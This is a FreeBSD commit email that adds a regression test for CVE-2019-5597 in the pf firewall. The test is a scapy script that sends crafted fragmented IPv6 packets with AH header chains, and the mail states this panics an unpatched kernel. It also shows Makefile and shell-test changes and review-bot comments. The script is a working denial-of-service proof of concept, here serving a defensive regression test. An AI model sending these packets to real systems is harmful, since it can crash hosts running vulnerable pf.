Date:      Tue, 5 Mar 2019 08:45:07 +0000 (UTC)
From:      Kristof Provost <kp@FreeBSD.org>
To:        src-committers@freebsd.org, svn-src-all@freebsd.org, svn-src-stable@freebsd.org, svn-src-stable-12@freebsd.org
Subject:   svn commit: r344793 - stable/12/tests/sys/netpfil/pf
Message-ID:  <201903050845.x258j7T2035155@repo.freebsd.org>

Author: kp
Date: Tue Mar  5 08:45:07 2019
New Revision: 344793
URL: https://svnweb.freebsd.org/changeset/base/344793

Log:
  MFC r344692:
  
  pf tests: Test CVE-2019-5597
  
  Generate a fragmented packet with different header chains, to provoke
  the incorrect behaviour of pf.
  Without the fix this will trigger a panic.
  
  Obtained from:	Corentin Bayet, Nicolas Collignon, Luca Moro at Synacktiv

Added:
  stable/12/tests/sys/netpfil/pf/CVE-2019-5597.py
     - copied unchanged from r344692, head/tests/sys/netpfil/pf/CVE-2019-5597.py
Modified:
  stable/12/tests/sys/netpfil/pf/Makefile
  stable/12/tests/sys/netpfil/pf/fragmentation.sh
Directory Properties:
  stable/12/   (props changed)

Copied: stable/12/tests/sys/netpfil/pf/CVE-2019-5597.py (from r344692, head/tests/sys/netpfil/pf/CVE-2019-5597.py)
==============================================================================
--- /dev/null	00:00:00 1970	(empty, because file is newly added)
+++ stable/12/tests/sys/netpfil/pf/CVE-2019-5597.py	Tue Mar  5 08:45:07 2019	(r344793, copy of r344692, head/tests/sys/netpfil/pf/CVE-2019-5597.py)
@@ -0,0 +1,35 @@
+#!/usr/local/bin/python2.7
+
+import random
+import scapy.all as sp
+import sys
+
+UDP_PROTO  = 17
+AH_PROTO   = 51
+FRAG_PROTO = 44
+
+def main():
+    intf = sys.argv[1]
+    ipv6_src = sys.argv[2]
+    ipv6_dst = sys.argv[3]
+
+    ipv6_main = sp.IPv6(dst=ipv6_dst, src=ipv6_src)
+
+    padding = 8
+    fid = random.randint(0,100000)
+    frag_0 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=1, offset=0)
+    frag_1 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=0, offset=padding/8)
+    
+    pkt1_opts = sp.AH(nh=AH_PROTO, payloadlen=200) \
+            / sp.Raw('XXXX' * 199) \
+            / sp.AH(nh=FRAG_PROTO, payloadlen=1) \
+            / frag_1
+
+    pkt0 = sp.Ether() / ipv6_main / frag_0 / sp.Raw('A' * padding)
+    pkt1 = sp.Ether() / ipv6_main / pkt1_opts / sp.Raw('B' * padding)
+
+    sp.sendp(pkt0, iface=intf, verbose=False)
+    sp.sendp(pkt1, iface=intf, verbose=False)
+
+if __name__ == '__main__':
+	main()
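Review bot: the `offset=padding/8` at `frag_1 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=0, offset=padding/8)` only yields the integer 1 because the shebang pins Python 2.7; under Python 3 the same expression gives `1.0`, which scapy will not accept as a fragment offset, so `padding // 8` (or the literal the test intends) would make the script portable to whichever interpreter the test host has. Two smaller points in the same hunk: the final `main()` call is indented with a tab while the rest of the file uses spaces, and `main()` reads `sys.argv[1..3]` without checking `len(sys.argv)`, so a wrong invocation from the shell test fails with an IndexError rather than a usage message. A short comment explaining why the second packet carries an AH chain of `payloadlen=200` followed by `payloadlen=1` before the fragment header would also help the next reader understand what condition in pf this exercises.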

Modified: stable/12/tests/sys/netpfil/pf/Makefile
==============================================================================
--- stable/12/tests/sys/netpfil/pf/Makefile	Tue Mar  5 08:33:14 2019	(r344792)
+++ stable/12/tests/sys/netpfil/pf/Makefile	Tue Mar  5 08:45:07 2019	(r344793)
@@ -19,8 +19,10 @@ ATF_TESTS_SH+=	anchor \
 
 ${PACKAGE}FILES+=	utils.subr \
 			echo_inetd.conf \
-			pft_ping.py
+			pft_ping.py \
+			CVE-2019-5597.py
 
 ${PACKAGE}FILESMODE_pft_ping.py=	0555
+${PACKAGE}FILESMODE_CVE-2019-5597.py=	0555
 
 .include <bsd.test.mk>

Modified: stable/12/tests/sys/netpfil/pf/fragmentation.sh
==============================================================================
--- stable/12/tests/sys/netpfil/pf/fragmentation.sh	Tue Mar  5 08:33:14 2019	(r344792)
+++ stable/12/tests/sys/netpfil/pf/fragmentation.sh	Tue Mar  5 08:45:07 2019	(r344793)
@@ -104,6 +104,11 @@ v6_body()
 
 	atf_check -s exit:0 -o ignore\
 		ping6 -c 1 -b 70000 -s 65000 2001:db8:43::3
+
+	$(atf_get_srcdir)/CVE-2019-5597.py \
+		${epair_send}a \
+		2001:db8:42::1 \
+		2001:db8:43::3
 }
 
 v6_cleanup()
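Review bot: the new invocation `$(atf_get_srcdir)/CVE-2019-5597.py \` is not wrapped in `atf_check`, unlike the `ping6` call just above it, so if the script exits non-zero for an unrelated reason (missing `/usr/local/bin/python2.7`, scapy not installed, wrong argument count) the test still passes and the regression check silently does nothing; `atf_check -s exit:0 $(atf_get_srcdir)/CVE-2019-5597.py ...` would surface that. It is also worth a one-line comment that the expected failure mode on an unpatched kernel is a panic of the test host rather than a test failure, since that is unusual for this test suite and matches what the log message says.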


